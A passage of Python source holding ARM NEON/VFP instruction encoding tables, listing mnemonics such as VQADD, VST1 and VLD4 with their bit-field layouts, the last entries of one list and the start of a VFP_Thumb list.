('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
]
VFP_Thumb = [
('VABA<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
('VABAL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
('VABD<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
('VABDL<c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
('VABD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
('VABS<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VADD<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,#0.0', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
('VCVT<c>.F64.F32 <Dd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
('VCVT<y><c>.F32.F16 <Sd>,<Sm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 0, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', 1, 1, 1, 0, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
